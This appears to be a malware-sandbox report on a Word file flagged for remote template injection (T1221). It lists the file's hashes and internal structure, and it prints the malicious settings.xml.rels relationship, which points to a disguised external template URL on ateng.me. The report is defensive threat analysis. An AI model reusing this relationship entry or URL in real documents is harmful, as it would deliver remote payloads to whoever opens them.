Malicious
Malicious

c76bd140c1cb43d8b1836833219fc55d

MS Word Document
|
MD5: c76bd140c1cb43d8b1836833219fc55d
|
Size: 274.19 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Print
General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
c76bd140c1cb43d8b1836833219fc55d
Sha1
49cdb115de4285558d7ffd92a89d8de12007f7c4
Sha256
ffb73ca08939ac414d353cfb188d6c2a087748349fb5d3d876d480c7e6637761
Sha384
09a6073213c0f3e8b628d0c395b0903fe82f09235f8bb910f81c18590c4419be74b5eb5ed34a92728202830ea3c09058
Sha512
3dace036e83f37080570e4ff9c9c8a78b6215bf80111de41cc58dae62c911e552aca76825f83ba6b296d3c7e7f1deb48cdce29cae58d60cf974d87e1b72470bb
SSDeep
3072:s+lTRadd4bZ8a1B02k7eHPUYBvvs+Q54hEK+n7fWsGInlX52N+/:s+K+bx1+/k8ovbQ54SvJF57/
TLSH
1E44C098DAF700B9EB23675F5454DF02842D3D2D7E6298128768EE78B2CC99F1460FC6
File Structure
c76bd140c1cb43d8b1836833219fc55d
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer3.xml
Xml
footer2.xml
Xml
header3.xml
Xml
header2.xml
Xml
endnotes.xml
Xml
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
styles.xml
Xml
worksheets
sheet2.xml
Xml
_rels
sheet1.xml.rels
Xml
sheet2.xml.rels
Xml
sheet1.xml
Xml
drawings
_rels
vmlDrawing1.vml.rels
Xml
vmlDrawing2.vml.rels
Xml
vmlDrawing2.vml
drawing1.xml
Xml
vmlDrawing1.vml
theme
theme1.xml
Xml
media
image2.emf
image1.emf
sharedStrings.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
media
image1.emf
theme
theme1.xml
Xml
settings.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
styles.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq
c76bd140c1cb43d8b1836833219fc55d (274.19 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙